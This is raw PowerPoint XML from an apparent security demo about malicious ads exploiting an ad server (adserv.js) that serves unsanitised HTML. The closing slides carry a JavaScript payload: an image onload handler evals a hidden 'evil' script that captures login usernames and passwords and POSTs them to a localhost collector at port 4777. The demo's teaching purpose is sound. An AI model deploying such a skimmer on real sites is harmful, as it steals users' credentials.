                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="sv-SE" sz="105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sv-SE" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1050" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>/form&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Höger 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1773132" y="4486099"/>
            <a:ext cx="437098" cy="28038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04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ktangel 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="165100" y="5177732"/>
            <a:ext cx="10292058" cy="958647"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent3">
                  <a:alpha val="48000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="90000">
                <a:schemeClr val="accent3">
                  <a:shade val="100000"/>
                  <a:alpha val="48000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent3">
                  <a:shade val="85000"/>
                  <a:alpha val="48000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="100000" t="100000" r="100000" b="100000"/>
            </a:path>
            <a:tileRect/>
          </a:gra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ktangel 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6396186" y="1638300"/>
            <a:ext cx="982958" cy="5816434"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent3">
                  <a:alpha val="48000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="90000">
                <a:schemeClr val="accent3">
                  <a:shade val="100000"/>
                  <a:alpha val="48000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="accent3">
                  <a:shade val="85000"/>
                  <a:alpha val="48000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect l="100000" t="100000" r="100000" b="100000"/>
            </a:path>
            <a:tileRect/>
          </a:gra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Bildobjekt 13" descr="cloud-icon-png-cloud-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759" y="2201405"/>
            <a:ext cx="3106856" cy="3106856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Web app? </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Bildobjekt 4" descr="images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22936" r="880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68" r="18338"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1191193" y="2758428"/>
            <a:ext cx="382022" cy="6598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Bildobjekt 5" descr="images.png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67742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659"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="698500" y="3884705"/>
            <a:ext cx="794805" cy="4954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Bildobjekt 6" descr="pc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48" y="4840897"/>
            <a:ext cx="816159" cy="8161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6" name="Rak pil 25"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1694223" y="3088360"/>
            <a:ext cx="1133636" cy="64080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Rak pil 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1493305" y="4118584"/>
            <a:ext cx="133455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Rak pil 27"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1846623" y="4569635"/>
            <a:ext cx="981236" cy="64046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Bildobjekt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7094" y="5564222"/>
            <a:ext cx="2324100" cy="918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Bildobjekt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95695" y="5275686"/>
            <a:ext cx="739582" cy="739582"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Bildobjekt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57014" y="3753024"/>
            <a:ext cx="1218756" cy="815306"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Bildobjekt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98329" y="5262986"/>
            <a:ext cx="813540" cy="813540"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="textruta 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3643371" y="3912477"/>
            <a:ext cx="18646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Availability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Bildobjekt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96186" y="2898128"/>
            <a:ext cx="1007998" cy="100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87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Attack 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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Malicious ad client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2146591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Rak 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5853900" y="1855692"/>
            <a:ext cx="0" cy="461912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1: Malicious ad client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Bildobjekt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927" y="2895244"/>
            <a:ext cx="615462" cy="679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Bildobjekt 3" descr="imgres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338" y="2774020"/>
            <a:ext cx="800354" cy="80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Bildobjekt 19" descr="1366511188978779390free-red-cloud-advertising-m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628" y="4555330"/>
            <a:ext cx="676048" cy="676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Bildobjekt 20" descr="analytics-icon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536" y="4555330"/>
            <a:ext cx="672527" cy="672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3" name="Rak pil 22"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3352255" y="3154205"/>
            <a:ext cx="9431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Rak pil 29"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2801328" y="3744715"/>
            <a:ext cx="9337" cy="67953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Rak pil 30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3196888" y="3476880"/>
            <a:ext cx="967752" cy="94736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Rak pil 32"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5261692" y="2637579"/>
            <a:ext cx="1144010" cy="357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Rak pil 35"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5161972" y="3437989"/>
            <a:ext cx="860882" cy="5847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Rak pil 37"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1583746" y="2569503"/>
            <a:ext cx="860882" cy="4259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Rak pil 39"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1583746" y="3263049"/>
            <a:ext cx="860882" cy="2686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7" name="Bildobjekt 36" descr="search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57" y="2189896"/>
            <a:ext cx="504000" cy="50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2" name="Bildobjekt 41" descr="imgres.jpg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57" y="3290585"/>
            <a:ext cx="502123" cy="50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Bildobjekt 42" descr="images.jpg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889" b="89778" l="0" r="100000">
                        <a14:foregroundMark x1="61333" y1="40000" x2="61333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967" y="3595860"/>
            <a:ext cx="853661" cy="853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4" name="Bildobjekt 43" descr="Cloud-Hosting-4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567" y="2189896"/>
            <a:ext cx="831354" cy="831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8" name="Bildobjekt 47" descr="imgres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121" y="5626997"/>
            <a:ext cx="800354" cy="80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9" name="Frihandsfigur 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="4896612"/>
            <a:ext cx="753533" cy="745265"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 753533"/>
              <a:gd name="connsiteY0" fmla="*/ 745265 h 745265"/>
              <a:gd name="connsiteX1" fmla="*/ 220133 w 753533"/>
              <a:gd name="connsiteY1" fmla="*/ 84865 h 745265"/>
              <a:gd name="connsiteX2" fmla="*/ 753533 w 753533"/>
              <a:gd name="connsiteY2" fmla="*/ 8665 h 74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3533" h="745265">
                <a:moveTo>
                  <a:pt x="0" y="745265"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="47272" y="476448"/>
                  <a:pt x="94544" y="207632"/>
                  <a:pt x="220133" y="84865"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="345722" y="-37902"/>
                  <a:pt x="753533" y="8665"/>
                  <a:pt x="753533" y="8665"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="317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Bildobjekt 49" descr="imgres.jpg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0" r="100000">
                        <a14:foregroundMark x1="16176" y1="5392" x2="52451" y2="215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482" y="4689079"/>
            <a:ext cx="711200" cy="711200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Frihandsfigur 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2104433" y="3422629"/>
            <a:ext cx="431864" cy="1227667"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 406464 w 431864"/>
              <a:gd name="connsiteY0" fmla="*/ 1227667 h 1227667"/>
              <a:gd name="connsiteX1" fmla="*/ 64 w 431864"/>
              <a:gd name="connsiteY1" fmla="*/ 533400 h 1227667"/>
              <a:gd name="connsiteX2" fmla="*/ 431864 w 431864"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 1227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1864" h="1227667">
                <a:moveTo>
                  <a:pt x="406464" y="1227667"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="201147" y="982839"/>
                  <a:pt x="-4169" y="738011"/>
                  <a:pt x="64" y="533400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4297" y="328789"/>
                  <a:pt x="431864" y="0"/>
                  <a:pt x="431864" y="0"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="317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Bildobjekt 51"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId17"/>
          <a:srcRect r="11976"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1214037" y="5716492"/>
            <a:ext cx="608936" cy="621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ihandsfigur 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1595280" y="2582082"/>
            <a:ext cx="2907189" cy="735602"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2907189"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 735602"/>
              <a:gd name="connsiteX1" fmla="*/ 1322404 w 2907189"/>
              <a:gd name="connsiteY1" fmla="*/ 629776 h 735602"/>
              <a:gd name="connsiteX2" fmla="*/ 2907189 w 2907189"/>
              <a:gd name="connsiteY2" fmla="*/ 734739 h 735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07189" h="735602">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="418936" y="253660"/>
                  <a:pt x="837873" y="507320"/>
                  <a:pt x="1322404" y="629776"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1806935" y="752232"/>
                  <a:pt x="2907189" y="734739"/>
                  <a:pt x="2907189" y="734739"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="31750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ihandsfigur 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1584786" y="2571586"/>
            <a:ext cx="1770142" cy="3096399"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1770142"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 3096399"/>
              <a:gd name="connsiteX1" fmla="*/ 1238441 w 1770142"/>
              <a:gd name="connsiteY1" fmla="*/ 650769 h 3096399"/>
              <a:gd name="connsiteX2" fmla="*/ 1763204 w 1770142"/>
              <a:gd name="connsiteY2" fmla="*/ 2235705 h 3096399"/>
              <a:gd name="connsiteX3" fmla="*/ 1553299 w 1770142"/>
              <a:gd name="connsiteY3" fmla="*/ 3096399 h 309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0142" h="3096399">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="472287" y="139076"/>
                  <a:pt x="944574" y="278152"/>
                  <a:pt x="1238441" y="650769"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1532308" y="1023386"/>
                  <a:pt x="1710728" y="1828100"/>
                  <a:pt x="1763204" y="2235705"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1815680" y="2643310"/>
                  <a:pt x="1553299" y="3096399"/>
                  <a:pt x="1553299" y="3096399"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="317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undad rektangulär 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352255" y="6142266"/>
            <a:ext cx="1604077" cy="391177"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -51769"/>
              <a:gd name="adj2" fmla="val -8764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localhost:7777</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Rundad rektangulär 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3557895" y="2078261"/>
            <a:ext cx="1604077" cy="391177"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 26091"/>
              <a:gd name="adj2" fmla="val 97497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localhost:5000</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Rundad rektangulär 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="978850" y="4158976"/>
            <a:ext cx="1604077" cy="391177"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 39177"/>
              <a:gd name="adj2" fmla="val 100180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localhost:4999</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Rundad rektangulär 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4888490" y="5134453"/>
            <a:ext cx="1604077" cy="391177"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -51769"/>
              <a:gd name="adj2" fmla="val -8764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localhost:4888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94272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innehåll 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1794862"/>
            <a:ext cx="8229600" cy="4670840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000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>adserv.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> serves html ads and acts as server for ad resources such as images</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Serves in a round robin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fashion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Example ad content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Fatal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>flaw – serves full html ads without any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>precautions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allows for script injection!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Let’s add a malicious ad!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Malicious ad client</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rektangel 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3406312"/>
            <a:ext cx="8229600" cy="92333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 smtClean="0"/>
              <a:t>www.company.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> class="pure-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-responsive" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="http://localhost:4999/ads/ad1.png"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4228257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innehåll 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380999" y="1719071"/>
            <a:ext cx="8407893" cy="4799112"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>href</a:t>
            </a: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="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>www.company.com</a:t>
            </a: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"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>img</a:t>
            </a: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 class="pure-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>img</a:t>
            </a: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-responsive"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/>
            </a:r>
            <a:b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</a:b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         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>src</a:t>
            </a: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="http://localhost:4999/ads/ad2.png"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>onload</a:t>
            </a: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="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a: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"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a: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('evil').text);"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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    &gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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&lt;script id="evil"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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urier"/>
                <a:cs typeface="Courier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 login = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a: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("login");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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  if (login) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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urier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>login.addEventListener</a:t>
            </a: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("click", function () {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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Courier"/>
                <a:cs typeface="Courier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 username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>document.getElementsByName</a:t>
            </a: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("username")[0].value;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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Courier"/>
                <a:cs typeface="Courier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 password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>document.getElementsByName</a:t>
            </a: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("password")[0].value;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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Courier"/>
                <a:cs typeface="Courier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/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>url</a:t>
            </a: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 = "http://localhost:4777/paste";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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Courier"/>
                <a:cs typeface="Courier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/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>req</a:t>
            </a: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 = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a: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();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>req.open</a:t>
            </a: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("POST", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>url</a:t>
            </a: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);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>req.setRequestHeader</a:t>
            </a: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("Content-type”,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/>
            </a:r>
            <a:b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</a:b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                           "</a:t>
            </a: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application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>urlencoded</a:t>
            </a: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");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>req.send</a:t>
            </a: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("username=" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>encodeURIComponent</a:t>
            </a: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(username) + </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="45720" indent="0">
              <a:buNone/>
            </a:pP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               "&amp;password=" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
